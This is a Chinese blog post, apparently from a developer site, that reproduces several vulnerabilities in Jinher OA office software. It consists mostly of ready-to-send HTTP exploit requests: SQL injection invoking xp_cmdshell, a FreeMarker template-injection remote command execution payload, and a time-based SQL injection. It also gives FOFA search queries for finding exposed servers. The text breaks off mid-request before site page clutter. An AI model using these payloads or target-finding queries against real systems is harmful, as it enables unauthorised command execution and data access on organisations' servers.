漏洞复现-金和OA系列

在这里插入图片描述

金和 0A C6-GetSqlData.aspx SQL 注入

POST /C6/Contro1/GetSqlData.aspx/.ashx
Host: ip:port
User-Agent: lozi1la/5.0 (Windows NT 5.1) ppleWebKit/537.36 (KHTMLlike Gecko)
Chrome/35.0.2117.157 Safari/537.36Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip
exec master..xp_cmdshell'ipconfig'

(21).金和OA--------------------------------------------fofa:app=“金和网络-金和OA”

🗡金和OA jc6 RCE

https://mp.weixin.qq.com/s/8VTorC_boGqtYk7qlsHyNg在这里插入图片描述

金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。金和OA viewConTemplate.action存在远程命令执行漏洞。

app=“金和网络-金和OA”||body=“/jc6/platform/sys/login”


POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 152
Content-Type: application/x-www-form-urlencoded

moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1

在这里插入图片描述

请联系厂家 http://www.jinher.com/升级

金和OA GetTreeDate.aspx SQL注入

【新】金和OA RssModulesHttp.aspx接口SQL注入漏洞复现

https://mp.weixin.qq.com/s/RM0gZfnSs4hsGa6MerqDog

GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=-1;WAITFOR+DELAY+%270:0:3%27-- HTTP/1.1
Host: 
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 
  • 23
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值